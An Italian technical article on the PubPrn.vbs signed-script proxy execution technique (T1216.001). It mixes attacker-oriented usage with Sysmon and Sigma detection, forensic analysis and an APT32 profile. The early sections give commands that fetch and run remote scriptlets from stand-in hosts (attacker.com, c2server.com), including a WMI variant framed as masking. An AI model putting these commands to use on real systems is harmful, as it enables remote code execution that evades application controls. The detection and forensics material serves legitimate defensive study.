PubPrn Proxy: System.Printing.IndexedProperties.PrintPropertyDictionary (T1216.001)

L'esecuzione di PubPrn per caricare payload remoti richiede una comprensione precisa della sintassi e delle limitazioni delle diverse versioni Windows. Su sistemi pre-Windows 10, il comando base segue questa struttura:

cscript pubprn.vbs 127.0.0.1 script:https://attacker.com/payload.sct

Il primo parametro rappresenta l'indirizzo della stampante fittizia, mentre il secondo utilizza il moniker script: per referenziare un file scriptlet (.sct) ospitato remotamente. Lo scriptlet può contenere codice JavaScript o VBScript arbitrario che verrà eseguito nel contesto di cscript.exe.

Per verificare la vulnerabilità del sistema target, puoi prima testare con uno scriptlet benigno che semplicemente crea un file marker:

<?XML version="1.0"?>
<scriptlet>
<registration progid="TestSCT" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}">
<script language="JScript">
<![CDATA[
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var file = fso.CreateTextFile("C:\\temp\\pubprn_test.txt", true);
    file.WriteLine("PubPrn execution successful");
    file.Close();
]]>
</script>
</registration>
</scriptlet>

Su sistemi Windows 10 aggiornati, il tentativo di utilizzo del parametro script: genererà un errore. Dovrai identificare sistemi legacy o non patchati per sfruttare questa tecnica. Un approccio alternativo consiste nell'utilizzo di proxy locali per convertire richieste LDAP in HTTP, ma questo aumenta significativamente la complessità dell'attacco.

Per mascherare ulteriormente l'esecuzione, considera l'embedding del comando PubPrn all'interno di batch script o l'utilizzo tramite WMI:

wmic process call create "cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://c2server.com/stage2.sct"

La detection di PubPrn richiede un approccio multi-livello che copra sia l'esecuzione del comando che le connessioni di rete risultanti. Il pattern chiave da monitorare è l'utilizzo del moniker script: seguito da un URL HTTP/HTTPS nei parametri di pubprn.vbs.

Configura le regole Sysmon per catturare gli eventi EventCode 1 (Process Creation) filtrando per:

• CommandLine contenente "pubprn.vbs" E "script:"
• ParentImage terminante con "cscript.exe" O "wscript.exe"
• CommandLine contenente pattern URL come "http://" o "https://"

Un esempio di regola Sigma potrebbe essere:

detection:
    selection:
        EventID: 1
        CommandLine|contains|all:
            - 'pubprn.vbs'
            - 'script:'
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: selection

Per ridurre i falsi positivi, implementa una whitelist dei domini legittimi se la tua organizzazione utilizza PubPrn per scopi amministrativi. Monitora anche le connessioni di rete anomale da cscript.exe verso domini esterni non categorizzati.

L'analisi comportamentale dovrebbe includere il monitoraggio della creazione di processi figli da cscript.exe dopo l'esecuzione di pubprn.vbs. Spesso gli scriptlet scaricati lanciano ulteriori payload o stabiliscono persistenza attraverso nuovi processi.

Considera l'implementazione di alerting basato sulla frequenza: l'esecuzione legittima di PubPrn per la gestione stampanti è tipicamente sporadica e limitata agli amministratori di dominio. Multipli eventi in breve tempo da utenti standard rappresentano un forte indicatore di compromissione.

L'analisi forense di un attacco PubPrn richiede la correlazione di diversi artefatti per ricostruire la sequenza completa degli eventi. Il punto di partenza è tipicamente il Windows Prefetch, dove troverai tracce di CSCRIPT.EXE con timestamp che indicano quando pubprn.vbs è stato eseguito.

Esamina il registro eventi Windows PowerShell (EventCode 4104) e gli eventi di Windows Script Host per catturare i dettagli completi della command line utilizzata. Questi log spesso preservano l'URL completo dello scriptlet remoto anche dopo che l'attaccante ha rimosso il file dal server.

La Master File Table (MFT) può rivelare la creazione temporanea di file .sct nella directory %TEMP% dell'utente. Anche se il file viene eliminato automaticamente dopo l'esecuzione, i record MFT possono persistere indicando nome, dimensione e timestamp.

Per ricostruire il contenuto dello scriptlet eseguito, analizza:

• Web proxy logs per il download dello .sct file
• Memory dumps del processo cscript.exe se disponibili
• Registry hive NTUSER.DAT per eventuali modifiche post-esecuzione

Gli artefatti di rete nel registro Security (EventCode 5156) mostrano le connessioni in uscita stabilite da cscript.exe verso il dominio maligno. Correla questi timestamp con l'esecuzione iniziale di pubprn.vbs per confermare la catena di attacco.

APT32 ha dimostrato l'uso di questa tecnica lasciando tracce specifiche: ricerca pattern di esecuzione ripetuta con URL incrementali (payload1.sct, payload2.sct) che indicano tentativi multipli o staging progressivo del malware.

APT32 (Ocean Lotus) rappresenta attualmente l'unico gruppo documentato nell'utilizzo di PubPrn.vbs per l'esecuzione di malware. Questo gruppo vietnamita, attivo dal 2014, ha dimostrato particolare creatività nell'abuso di funzionalità legittime Windows per aggirare i controlli di sicurezza.

Il profilo operativo del gruppo mostra una preferenza per tecniche Living off the Land (LOLBins) che sfruttano binari firmati Microsoft. L'utilizzo di PubPrn si inserisce in questo pattern insieme ad altre tecniche come regsvr32.exe e mshta.exe per il proxy execution.

L'analisi delle campagne suggerisce che APT32 utilizza PubPrn principalmente nelle fasi iniziali dell'intrusione, specificamente per:

• Bypass dei controlli applicativi in ambienti enterprise
• Esecuzione di backdoor personalizzate senza triggering di AV
• Mantenimento di un profilo operativo "low and slow"

La scelta geografica dei target di APT32 si concentra nel Sud-Est asiatico con particolare focus su organizzazioni governative e aziende manifatturiere. Il gruppo adatta costantemente le proprie tecniche basandosi sulle patch Microsoft, suggerendo che potrebbero già star sviluppando alternative a PubPrn per sistemi Windows 10+.

Per anticipare le evoluzioni, monitora altri script di amministrazione Windows firmati che accettano parametri URL o file remoti. Script come syncappvpublishingserver.vbs e manage-bde.wsf rappresentano potenziali candidati per tecniche simili.

MITRE ATT&CK Framework T1216.001. Documentazione Microsoft su PubPrn.vbs e relative patch di sicurezza. Report pubblici su campagne APT32/Ocean Lotus. Windows Defender Application Control implementation guidance. Sigma rules repository per PubPrn detection patterns.